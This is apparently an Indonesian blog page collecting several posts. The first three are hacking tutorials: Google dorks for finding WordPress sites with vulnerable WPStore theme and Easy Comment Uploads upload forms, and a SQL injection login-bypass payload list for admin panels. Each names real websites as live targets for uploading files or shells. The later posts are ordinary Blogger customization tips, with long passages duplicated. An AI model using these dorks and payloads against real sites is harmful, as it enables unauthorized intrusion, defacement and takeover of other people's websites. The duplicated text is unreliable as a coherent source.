Wordpress WPStore Theme Remote File Upload
Apa sih wordpress wpstore theme remote file upload itu ?
ya itu adalah bug untuk mengupload sebuah shell / fiile kewebsite hanya memasukan exploit link,,
langsung saja nih gan cekidot . .
pertama masuk situs Google dulu gan ,, tau kan google ? haha
masukan Dork : inurl:/wp-content/themes/WPstore/ (kembangin sendiri)
nah nanti banyak tuh gan situs situs disana , tinggal pilih aja salah satunya klik gan . .
setelah itu masukan exploitnya seperti dibawah ini
Exploit ==> /wp-content/themes/WPStore/upload/
sehigga alamatsitus.anu/wp-content/themes/WPStore/upload/
Life target : www.wholisticnutrition.com.au/wp-content/themes/WPStore/upload/
kalo vuln skrinsutnya kayak gini gan :
Tinggal klik choose file gan ,, pilih file yang mau diuploadnya .
Biasanya sih ekstensi file yang suport sepert : .html , .pdf , .jpg ,.gif
untuk cek file :
alamatsitus.anu/wp-content/uploads/products_img/namafilekamu
Contohnya : www.wholisticnutrition.com.au/wp-content/uploads/products_img/hosting.html
Jika berhasil file kamu dapat dibuka ^_^ ,, hehe .. .
Sekian dari saya semoga bermanfaat ^_^
Catatan : jangan sepelekan ilmu karena sekecil apapun itu gunakanlah untuk hal yang besar ^_^
Terimakasih telah mengunjungi blog kami ^_^ tolong tinggalkan komentar untuk menghargai kami ^_^
Wassalam . .
Wp - Content Plugins Easy Comment Remote File Upload
Okeh gan kali ini ane mau share satu lagi masih tentang exploit - exploit nih :3 haha
ane diajari sama seorang master yang sangat terkenal kayaknya :3 hahaha
Langung saja deh cekibrot gan ! >>
Pertama : Buka web browser agan
Kedua : buka google dan masukan >>
Dork : inurl:wp-content/plugins/easy-comment-uploads/upload-form.php
nah tinggal enter gan ,, klik aja link yang tampil disana ,,
masukan exploitnya : wp-content/plugins/easy-comment-uploads/upload-form.php
maka : www.target.com/wp-content/plugins/easy-comment-uploads/upload-form.php
Live target : https://www.fairyhouses.com/wp-content/plugins/easy-comment-uploads/upload-form.php
Nah kalo vuln cuplikannya seperti ini gan :
Tinggal klik aja tombol Chose File nya gan ,, pilih file yang mau agan upload ,, biasanya berekstensi : .txt , .jpg gan ,, hehe lumayan lah buat nitip file ,, haha
nah kalo udah agan bisa cek misalnya
www.target.com/wp-content/uploads/2014/09/filekamu
ganti patch tahun - bulan nya dengan tahun - bulan agan upload ya ^_^ hehe
Contoh : https://www.fairyhouses.com/wp-content/uploads/2014/09/belajar.txt
nah sudah mengerti kan gan ? :3 haha mudah banget sih itu tapi lumayan lah buat tambahan ilmu meski dikit :3 hehehe
Sekian dari saya , Terimakasih telah berkunjung di blog kami ^_^ mohon tinggalkan komentar untuk menghargai admin ^_^
Catatan : Jangan sepelekan ilmu , karena sekecil apapun itu gunakanlah untuk hal yang besar.
Query String Bypass Admin Login
Nah sekarang saya akan sedikit share mengenai hak hek hok nih ^_^ haha
Kali ini saya akan share mengenai "Query String Bypass Admin Login".
Query String Bypass Admin Login adalah suatu perintah sql dimana system akan mengeksekusi menjadi query dari user:pass administrator untuk masuk ke halaman admin panel.
query itu sendiri ' or 1=1 limit 1 -- -+ <~
Hal tersebut terjadi karena form login tersebut dicek dengan menggunakan perintah :
"SELECT * FROM user WHERE username = '$username' AND password = '$password'"
Sehingga jika variabel username diberi input (' or 1=1--), maka query SQLnya akan menjadi
"SELECT * FROM user WHERE username = '' or 1=1--' AND password = ''"
Pernyataan 1=1 akan membuat query tersebut selalu mengembalikan nilai TRUE untuk pernyataan tersebut. Karakter double sign setelah username akan membuat pemeriksaan terhadap password akan diabaikan sehingga penyusup tidak perlu memasukan password.Selain dengan String tersebut, beberapa String berikut juga biasa digunakan untuk mengecek adakah celah keamanan pada suatu form login. String – string tersebut adalah:
' or 1=1-- " or 1=1—or 0=0 -- ' or 1=1 #" or 1=1 #
or 0=0 #' or 'x' = 'x " or "x" = "x') or ('x' = 'x ' or 1=1--" or 1=1--
or 1=1--" or a=a--
' or 1=1-- " or 1=1—or 0=0 -- ' or 1=1 #" or 1=1 #
or 0=0 #' or 'x' = 'x " or "x" = "x') or ('x' = 'x ' or 1=1--" or 1=1--
or 1=1--" or a=a--
Lebih jelas kita langsung cekidot yu ^_^.
Pertama seperti biasa kita akan memanfaatkan google ^_^.
#Dork : inurl:admin/index.php (dork kembangin)
Langsung saja pilih link yang sekiranya vuln ^_^.
Tampilan dengan contoh saya bisa berbeda ,
Contoh punya saya :
Nah pada kotak user dan passwordnya masukan query : ' or 1=1 limit 1 -- -+ <~
Jika vuln , secara otomatis jika kita klik login maka akan menuju kehalaman admin panelnya ^_^ .
Nah sudah agak faham kan ? ^_^ .
Memang pengertian SQL sangatlah panjang , saya hanya bisa menerangkannya sampai disini ^_^ Silahkan download pengertian lebih rincinya lagi ^_^.
Terimakasi dan sampai jumpa ~~>> salam IT .
Live target :
http://www.greatm1.com/admin/index.php
http://www.lobservatori.net/admin/index.php
Download pengertian lebih lengkap : http://adf.ly/sicno
http://www.greatm1.com/admin/index.php
http://www.lobservatori.net/admin/index.php
Download pengertian lebih lengkap : http://adf.ly/sicno
Cara Memasang atau Membuat Tukar Link Otomatis Di Blog
Tukar link adalah salah satu teknik seo untuk mendapatkan sebuah backlink dan saling menguntungkan sama satu lain antara blog ata website yang bertukar link, seiring dengan perkembanganya tukar link juga sudah bisa di lakukan secara otomatis dan bisa di pasang di blog siapa saja, bagi anda yang ingin memasang tukar link otomatis di blog, silahkan ikuti tutorialnya di bawah ini.
1. Pertama kunjungi www.simply-linked.com kemudian klik sign up for a free account!
2. kemudian silahkan isi semua data dengan benar dari mulai YOUR NAME sampe PASSWORD kemudian klik SUBMIT
selamat akun anda sudah selesai dibuat.
3. langkah selanjutnya silahkan kembali kunjungi www.simply-linked.com dan login dengan akun yang baru saja anda buat.
4. Setelah berhasil Login kemudian klik Create New List
5. Name of List silahkan di isi dengan nama Blog anda, type pilih standard.
6. kemudian copy semua kode yang saya beri tanda lingkaran merah seperti pada gambar di bawah ini.
7. setelah semua kode di copy langkah selanjutnya adalah menerapkannya di blog anda, cara nya silahkan buat postingan baru, judul postingannya misalnya TUKAR LINK OTOMATIS kemudian klik pada HTML dan pastekan kode yang ada copy tadi.
selamat menu tukar link otomatis anda sudah jadi dan hasilnya akan seperti gambar di bawah ini.
CARA KERJA TUKAR LINK OTOMATIS INI :
pengunjung yang ingin bertukar link dengan blog anda akan mengisi form yang tersedia, dari mulai link title, e-mail, dan url blog.
setelah klik Submit link maka secara otomatis link blog yang bertukar link dengan kita akan muncul secra otomatis, seperti pada gambar di bawah ini.
dengan memasang tukar link otomatis ini maka akan memudahkan orang lain yang ingin bertukar link dengan kita, - See more at: http://cafeilmu-yangyang.blogspot.com/2014/02/cara-memasang-atau-membuat-tukar-link.html#sthash.xSR8Fac4.dpuf
1. Pertama kunjungi www.simply-linked.com kemudian klik sign up for a free account!
2. kemudian silahkan isi semua data dengan benar dari mulai YOUR NAME sampe PASSWORD kemudian klik SUBMIT
selamat akun anda sudah selesai dibuat.
3. langkah selanjutnya silahkan kembali kunjungi www.simply-linked.com dan login dengan akun yang baru saja anda buat.
5. Name of List silahkan di isi dengan nama Blog anda, type pilih standard.
6. kemudian copy semua kode yang saya beri tanda lingkaran merah seperti pada gambar di bawah ini.
selamat menu tukar link otomatis anda sudah jadi dan hasilnya akan seperti gambar di bawah ini.
CARA KERJA TUKAR LINK OTOMATIS INI :
pengunjung yang ingin bertukar link dengan blog anda akan mengisi form yang tersedia, dari mulai link title, e-mail, dan url blog.
setelah klik Submit link maka secara otomatis link blog yang bertukar link dengan kita akan muncul secra otomatis, seperti pada gambar di bawah ini.
dengan memasang tukar link otomatis ini maka akan memudahkan orang lain yang ingin bertukar link dengan kita, - See more at: http://cafeilmu-yangyang.blogspot.com/2014/02/cara-memasang-atau-membuat-tukar-link.html#sthash.xSR8Fac4.dpuf
Cara Mengatasi Widget Sidebar sebelah kanan pindah kebawah postingan
ini nih salah satu probem yang pernah saya temui di blog saya ini, tiba-tiba sidebar sebelah kanan yang berisi widget dan kategori pindah ke bagian sebelah bawah blog ini, hal ini cukup aneh karena widget pindah ke bawah hanya di homepage aja atau di halaman utama blog, saya coba klik salah satu artikel dan hasilnya widget normal-normal saja.
masalah tersebut benar-benar bikin saya pusing karena sebelumnya saya belum pernah menghadapi kasus yang seperti ini,mau ganti template udah terlajur suka sama templatenya, akhirnya saya coba cari-cari artikel di google tentang cara mengatasinya ternyata masih sedikit para blogger yang memposting tentang cara mengatasinya, tapi akhirnya saya menemukan salah satu artikel.
sidebar yang pindah ke bawah ini ada beberapa faktor penyebabnya :
1. ada kode yang salah/error pada widget di sidebar
2. gambar di sidebar atau di dalam postingan melebihi lebar dari sidebar
3. artikel yang di ketik dari microsoft word dan kemudian di pastekan ke dalam postingan blog atau artikel hasil copas dari orang lain yang tidak cocok dengan blog kita, sehingga tag html/kode yang ada di postingan tidak tertutup dengan benar.
setelah saya teliti ternyata masalah yang ada di blog saya ini di sebabkan oleh postingan terbaru saya, yang artinya saya terkena masalah tipe no 3 seperti yang disebutkan di atas, saya baru ingat sebelum ada postingan itu blog saya baik-baik saja tetapi setelah saya postkan tiba-tiba widget sidebar saya pindah kebawah.
untuk mengatasinya cukup mudah, anda hanya perlu mengedit artikel yang menjadi sumber masalah tersebut atau bisa juga dengan menghapusnya, saya sendiri memilih untuk mengeditnya dengan cara menghapus isi artikelnya dan saya ketik ulang lagi kemudian saya publish ulang, dan hasilnya blog saya pun kembali normal.
bagi anda yang mengalami masalah yang sama bisa coba teknik saya ini dan semoga blog anda bisa kembali normal tanpa harus ganti template.
semoga bermanfaat :) - See more at: http://cafeilmu-yangyang.blogspot.com/2014/02/cara-mengatasi-widget-sidebar-sebelah.html#sthash.jfKHCgZB.dpuf
masalah tersebut benar-benar bikin saya pusing karena sebelumnya saya belum pernah menghadapi kasus yang seperti ini,mau ganti template udah terlajur suka sama templatenya, akhirnya saya coba cari-cari artikel di google tentang cara mengatasinya ternyata masih sedikit para blogger yang memposting tentang cara mengatasinya, tapi akhirnya saya menemukan salah satu artikel.
sidebar yang pindah ke bawah ini ada beberapa faktor penyebabnya :
1. ada kode yang salah/error pada widget di sidebar
2. gambar di sidebar atau di dalam postingan melebihi lebar dari sidebar
3. artikel yang di ketik dari microsoft word dan kemudian di pastekan ke dalam postingan blog atau artikel hasil copas dari orang lain yang tidak cocok dengan blog kita, sehingga tag html/kode yang ada di postingan tidak tertutup dengan benar.
setelah saya teliti ternyata masalah yang ada di blog saya ini di sebabkan oleh postingan terbaru saya, yang artinya saya terkena masalah tipe no 3 seperti yang disebutkan di atas, saya baru ingat sebelum ada postingan itu blog saya baik-baik saja tetapi setelah saya postkan tiba-tiba widget sidebar saya pindah kebawah.
untuk mengatasinya cukup mudah, anda hanya perlu mengedit artikel yang menjadi sumber masalah tersebut atau bisa juga dengan menghapusnya, saya sendiri memilih untuk mengeditnya dengan cara menghapus isi artikelnya dan saya ketik ulang lagi kemudian saya publish ulang, dan hasilnya blog saya pun kembali normal.
bagi anda yang mengalami masalah yang sama bisa coba teknik saya ini dan semoga blog anda bisa kembali normal tanpa harus ganti template.
semoga bermanfaat :) - See more at: http://cafeilmu-yangyang.blogspot.com/2014/02/cara-mengatasi-widget-sidebar-sebelah.html#sthash.jfKHCgZB.dpuf
Cara Membuat Author Box di bagian Akhir Postingan Blog
Author Box penulis ini selain berfungsi untuk menghias blog, juga dapat membuat blog terlihat lebih profesional karena menampilkan sedikit profil dari penulis itu sendiri, sekarang ini sudah banyak sekali para pemilik blog yang memasang kotak penulis di akhir postingan alias author box. untuk memasang author box sebenarnya mudah saja, silahkan ikuti tutorial berikut ini.
1. silahkan login ke akun blogger anda kemudian masuk ke menu Template >> Edit Html
2. Cari kode ]]></b:skin> den letakan kode di bawah ini tepat di atas kode ]]></b:skin>
Catatan : #CFE2E0 adalah warna background teks dan #f60521 adalah warna background pada tulisan creatif by.
3.cara kode ini <data:post.body/> jika sudah ketemu silahkan pasang kode di bawah ini tepat di Bawah kode <data:post.body/>
2. Cari kode ]]></b:skin> den letakan kode di bawah ini tepat di atas kode ]]></b:skin>
/* kotak author tempat blogging */
.admin-tulisan{display:block;width:auto;background:#CFE2E0;border:2px solid #fff;box-shadow:0 1px 3px #000;-moz-box-shadow:0 1px 3px #000;-webkit-box-shadow:0 1px 3px #000;padding:0;margin:30px 0 10px 0;font:normal 12px Arial, Sans-Serif;color:#222;}
.admin-tulisan .kontainer{padding:5px;}
.admin-tulisan h4{background:#f60521;border:none;border-bottom:1px solid #699019;color:#fff;text-transform:normal;text-shadow:0 1px 0 rgba(0, 0, 0, 0.4);font:bold 12px Arial,Sans-Serif;padding:5px 10px;margin:0 0 0 0;display:block;}
.admin-tulisan h4 a{color:#FEEA83;}
.admin-tulisan img{width:70px;height:70px;margin:0 10px 0 0;float:left;border:1px solid #954B02;padding:2px;background:#C36702;
box-shadow:none;-moz-box-shadow:none;-webkit-box-shadow:none;margin: 0px;border: 5px solid #eee;-webkit-box-shadow: 4px 4px 4px rgba(0,0,0,0.2);-moz-box-shadow: 4px 4px 4px rgba(0,0,0,0.2);box-shadow: 4px 4px 4px rgba(0,0,0,0.2);-webkit-transition: all 0.5s ease-out;-moz-transition: all 0.5s ease;-o-transition: all 0.5s ease;-webkit-transform: rotate(-7deg);-moz-transform: rotate(-7deg);-o-transform: rotate(-7deg);}
/* kotak author tempat blogging */
Catatan : #CFE2E0 adalah warna background teks dan #f60521 adalah warna background pada tulisan creatif by.
3.cara kode ini <data:post.body/> jika sudah ketemu silahkan pasang kode di bawah ini tepat di Bawah kode <data:post.body/>
<!-- Kotak Admin Tempat Blogging -->Catatan : yang berwarna merah ganti dengan Nama Blog Anda dan Yang berwarna biru ganti dengan Url link Gambar anda, jika authorbox nya tidak muncul itu di sebabkan karena biasanya kode <data:post.body/> terdapat lebih dari satu dan bisa terdapat banyak hal tersebut karena setiap template itu strukturnya berbeda-beda, maka dari itu silahkan coba tempatkan kode diatas dengan mencoba satu-persatu sampe berhasil. - See more at: http://cafeilmu-yangyang.blogspot.com/2014/02/cara-membuat-author-box-di-bagian-akhir.html#sthash.d08755lB.dpuf
<b:if cond='data:blog.pageType == "item"'>
<div class='admin-tulisan'>
<h4>Creatif By : <a expr:href='data:blog.homepageUrl'><data:post.author/></a> | Cafe Ilmu</h4>
<div class='kontainer'>
<img src='https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash3/t1/17611_317598061676498_376119275_n.jpg'/>
Terimah Kasih telah membaca artikel --> <a expr:href='data:post.url'><data:post.title/></a>. Yang ditulis oleh <data:post.author/> .Pada hari --> <data:post.dateHeader/>. Jika anda ingin sebarluaskan artikel ini, mohon sertakan <strong>sumber link asli.</strong> Kritik dan saran dapat anda sampaikan melalui kotak komentar. Trimakasih
<p>
<textarea cols='75' id='bloglinking' name='bloglinking' onclick='this.focus();this.select()' onfocus='this.select()' onmouseover='this.focus()' readonly='readonly' rows='2'><a href="<data:post.url/>" target="_blank"><data:blog.pageName/></a></textarea></p>
<div style='clear:both;'/>
</div>
</div>
</b:if>
<!-- Kotak Admin Tempat Blogging -->
Kode Html untuk Mengecilkan dan Membesarkan Ukuran Gambar
Favicon bawaan blogspot sangatlah standar dan tentunya membosankan bahkan pasaran karena banyak para blogger lain yang menggunakannya.
Logo B seperti gambar di atas adalah favicon bawaan blogspot dan tentunya itu sangat membosankan dan hal itu membuat blog anda terlihat kurang profesiaonal. akan jauh terlihat menarik favicon bawaan terdebut di ganti dengan icon yang lebih menggambarkan deskripsi blog anda.
Nah kali ini saya akan memberikan tutorial cara memasang favicon bergerak alias gif tentunya favicon ini lebih keren karena favicon yang akan kita pasang bisa bergerak, untuk contoh nyatanya silahkan lihat blog saya ini di bagian address bar terdapat favicon bergerak dengan logo bendera indonesia.
untuk memasangnya silahkan ikuti petunjuk berikut ini :
1. Login di blogger[dot]com
2. template
3. centang pada "Expand Template Widge"
4. cari kode ini <b:skin><![CDATA[ atau kode yang mirip dengan kode tersebut , jika sudah di temukan silahkan pastekan kode di bawah ini tepat di atas kode tersebut.
<link href='http://i857.photobucket.com/albums/ab139/wiwidhw/Indonesia-120-animated-flag-gifs.gif' rel='shortcut icon' type='image/x-icon'/>
keterangan : ganti kode ini http://i857.photobucket.com/albums/ab139/wiwidhw/Indonesia-120-animated-flag-gifs.gif dengan kode gambar bergerak yang sudah anda siapkan.
Contoh pemasangan kodenya seperti ini :
<b:skin><![CDATA[
<link href='http://i857.photobucket.com/albums/ab139/wiwidhw/Indonesia-120-animated-flag-gifs.gif' rel='shortcut icon' type='image/x-icon'/>
5. klik simpan template.
sekian tutorial cara memasang favicon bergerak yang dapat saya berikan semoga bisa bermanfaat.
Logo B seperti gambar di atas adalah favicon bawaan blogspot dan tentunya itu sangat membosankan dan hal itu membuat blog anda terlihat kurang profesiaonal. akan jauh terlihat menarik favicon bawaan terdebut di ganti dengan icon yang lebih menggambarkan deskripsi blog anda.
Nah kali ini saya akan memberikan tutorial cara memasang favicon bergerak alias gif tentunya favicon ini lebih keren karena favicon yang akan kita pasang bisa bergerak, untuk contoh nyatanya silahkan lihat blog saya ini di bagian address bar terdapat favicon bergerak dengan logo bendera indonesia.
untuk memasangnya silahkan ikuti petunjuk berikut ini :
1. Login di blogger[dot]com
2. template
3. centang pada "Expand Template Widge"
4. cari kode ini <b:skin><![CDATA[ atau kode yang mirip dengan kode tersebut , jika sudah di temukan silahkan pastekan kode di bawah ini tepat di atas kode tersebut.
<link href='http://i857.photobucket.com/albums/ab139/wiwidhw/Indonesia-120-animated-flag-gifs.gif' rel='shortcut icon' type='image/x-icon'/>
keterangan : ganti kode ini http://i857.photobucket.com/albums/ab139/wiwidhw/Indonesia-120-animated-flag-gifs.gif dengan kode gambar bergerak yang sudah anda siapkan.
Contoh pemasangan kodenya seperti ini :
<b:skin><![CDATA[
<link href='http://i857.photobucket.com/albums/ab139/wiwidhw/Indonesia-120-animated-flag-gifs.gif' rel='shortcut icon' type='image/x-icon'/>
5. klik simpan template.
sekian tutorial cara memasang favicon bergerak yang dapat saya berikan semoga bisa bermanfaat.